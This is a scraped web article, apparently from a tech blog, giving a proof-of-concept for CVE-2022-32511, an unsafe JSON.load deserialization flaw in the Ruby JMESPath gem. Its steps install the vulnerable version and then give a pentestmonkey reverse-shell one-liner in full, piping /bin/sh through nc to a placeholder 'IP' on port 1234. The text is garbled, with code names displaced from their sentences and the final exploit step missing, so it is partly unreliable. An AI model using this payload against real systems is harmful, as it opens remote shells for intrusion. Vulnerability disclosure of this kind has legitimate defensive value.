Description Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of , which is considered unsafe when used with untrusted input. JSON.load Proof-of-concept In order to reproduce the steps we first require to install ‘JMESPath 1.6.0’ or before: 2. To import the library fire ‘ with the following mentioned command: Interactive Ruby Shell’ irb 3. In case you don’t have ‘irb’ installed then use the following command to download the same: gem install IRB 4. Pick the desired payload, I have picked one from : pentestmonkey rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f 5. Finally, import the vulnerable ‘JMESPath’ library and supply the payload to execute the reverse shell: Conclusion It is recommended to use instead of . In this case, we observed that the has failed to validate the input data which leads to Remote Code Execution. JSON.parse JSON.load JSON.load

Here’s a Proof-Of-Concept for CVE-2022–32511 to Gain Remote Code Execution

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

A Guide to Understanding the Job Roles & Selecting Your Career in Cybersecurity

5 Tips for Integrating Security into Development - Part 1

5 Types of Cyber Security and Why It’s Important to be Aware of Them

Application Security Posture Management: An Overview

Balancing Cybersecurity Risk with Technological Innovation: Using Policy as Code

ChatGPT Will Change Cybersecurity…but How?

A Guide to Understanding the Job Roles & Selecting Your Career in Cybersecurity

5 Tips for Integrating Security into Development - Part 1

5 Types of Cyber Security and Why It’s Important to be Aware of Them

Application Security Posture Management: An Overview

Balancing Cybersecurity Risk with Technological Innovation: Using Policy as Code

ChatGPT Will Change Cybersecurity…but How?

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps